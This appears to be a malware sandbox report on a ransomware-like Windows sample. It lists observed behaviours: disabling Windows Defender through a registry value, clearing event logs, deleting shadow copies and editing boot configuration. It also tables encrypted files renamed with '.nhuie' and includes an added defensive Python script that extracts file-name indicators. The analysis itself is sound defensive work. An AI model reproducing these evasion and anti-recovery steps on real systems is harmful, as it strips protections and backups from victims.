memory/2916-233-0x000001774D5C0000-0x000001774D5C2000-memory.dmp

memory/2916-234-0x000001774D5C3000-0x000001774D5C5000-memory.dmp

memory/2916-235-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-262-0x000001774D5C8000-0x000001774D5C9000-memory.dmp

memory/2916-261-0x000001774D5C6000-0x000001774D5C8000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 13:50

Reported

2022-01-12 13:53

Platform

win7-en-20211208

Max time kernel

56s

Max time network

14s

Command Line

"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_vZfD-V18bxw0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office64.en-us\Office64MUI.XML.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_wpqccwWqSQ00.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD08758_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_nbxKFTnjfCw0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00057_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_s--HhbcbPHc0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ZVZ_GPEsNBQ0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18223_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_R8NOtC1gppM0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Sort\TAG.XSL.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_I4sn0JUgCAg0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_QL9MgxSGUws0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_7NQdiSHeNsc0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_aMOqLMxR8e80.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\js\settings.js C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_eu-dVV33kZY0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ev_-27KNk5E0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_LndxBTbxB_w0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\slideShow.html C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_jIbtgodAJFg0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_qaano4YQqxE0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21343_.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_munT2o7C26A0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR38F.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_J5scqS3DNII0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_4z-hOkFJlRU0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_N6L8jBrR-ow0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr__AncrF1MLFE0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00257_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_gvttde7q2MA0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR20F.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_0W4IcU_rBeU0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_TJIa3I7Bt5Y0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\ChessMCE.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\service.js C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01162_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_1Nr22t1O6D40.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287415.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_rPylWeJ7pps0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_OFF.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_0mCG4G8iwpM0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_Twee6Ne4A_00.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_I_HOtQAf5Ao0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_dvNCxjanJTE0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01246_.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_p829PzQtYR80.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_PGm3nfRTeqk0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10300_.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr__Opr0xkiY2Y0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00693_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_aRW8nZkXQvc0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_Vou8PlWdtpQ0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_mv7o_dCdLmY0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_select-highlight.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_o9jzJrgCYY00.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_iGsniWrgvb40.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ZLQq19hF2EQ0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_HSKbDrluAKM0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00687_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_r27Plihq67Y0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_rYfPHSQYOFs0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_q-u2tKYvW1M0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME34.CSS.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_KwQsK0fpn2A0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00319_.WMF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_Oohs1Dt8RLU0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_0sN_Ad_TUnw0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\micaut.dll.mui C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_7ztsbxZLeEI0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_wigUdjK1l9E0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_ouWHgh-wETo0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_rD5yhPmq55o0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
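
Most targets in the table above carry a trailing token and the extension .nhuie, i.e. they were renamed as they were encrypted, while a handful (the Windows Sidebar gadget .png files, micaut.dll.mui, bl.gif) are listed under their original names. The following added example, not part of the sandbox report, parses rows in this table's format, separates renamed from untouched entries, derives the token prefix that every renamed file shares (the report does not say what it encodes, so it is treated only as a run-specific indicator), and tallies the original extensions hit. The input rows are copied from the table above; the layout "original name, dot, base64url-style token, .nhuie" is an assumption drawn from those rows.

```python
"""Pull file-rename indicators out of 'File opened for modification' rows.

Added example, not part of the sandbox report.  Assumed rename layout,
inferred from the rows on this page:
    <original path>.<token>.nhuie
What <token> encodes is not stated in the report; it is used here only as
a run-specific indicator.
"""
import ntpath
import os
import re
from collections import Counter

# Constructed sample: rows copied verbatim from the table above.
REPORT_ROWS = r"""
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_Twee6Ne4A_00.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_I_HOtQAf5Ao0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_dvNCxjanJTE0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01246_.GIF.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_p829PzQtYR80.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_rYfPHSQYOFs0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York.PzJC1Zw4haTRZFX9GXdOVLM5C79Ke1MMd1OXLWNYQAr_o9jzJrgCYY00.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
"""

# Row layout: 'File opened for modification <target> <process> N/A'.
# The target may contain spaces; the sandbox's process path does not.
ROW_RE = re.compile(r"^File opened for modification (?P<target>.+?) (?P<proc>[A-Za-z]:\\\S+) N/A$")
# Assumed rename layout (see module docstring).
RENAMED_RE = re.compile(r"^(?P<orig>.+)\.(?P<token>[A-Za-z0-9_-]+)\.nhuie$")


def parse_rows(text):
    """Return [(target_path, process_path)] for every well-formed row."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append((m.group("target"), m.group("proc")))
    return rows


def split_renamed(target):
    """(original_path, token) if the path carries the .nhuie rename, else None."""
    m = RENAMED_RE.match(target)
    return (m.group("orig"), m.group("token")) if m else None


def summarize(text):
    """Separate renamed from untouched files and derive the shared token prefix."""
    renamed, untouched = [], []
    for target, _proc in parse_rows(text):
        hit = split_renamed(target)
        if hit:
            renamed.append(hit)
        else:
            untouched.append(target)
    tokens = [tok for _orig, tok in renamed]
    # Character-wise common prefix of all tokens: constant for this run,
    # so it is the part worth recording as an indicator.
    prefix = os.path.commonprefix(tokens)
    return {
        "rows": len(renamed) + len(untouched),
        "renamed": renamed,
        "untouched": untouched,
        "shared_prefix": prefix,
        "per_file_suffixes": [tok[len(prefix):] for tok in tokens],
        # ntpath splits backslash paths correctly whatever the host OS is.
        "extensions": Counter(ntpath.splitext(orig)[1].lower() or "(none)" for orig, _ in renamed),
    }


if __name__ == "__main__":
    s = summarize(REPORT_ROWS)
    print(f"{s['rows']} rows: {len(s['renamed'])} renamed, {len(s['untouched'])} untouched")
    print("shared token prefix:", s["shared_prefix"])
    print("per-file suffixes:  ", s["per_file_suffixes"])
    print("extensions hit:     ", dict(s["extensions"]))
    for path in s["untouched"]:
        print("not renamed:", ntpath.basename(path))
```

Run against the full table rather than this subset, the untouched list is the quickest way to see which file types or directories the sample skips, and the shared prefix plus the extension .nhuie make a file-name indicator specific to this detonation. The per-file suffix differs for every file, so it should not be used as an indicator on its own.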

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
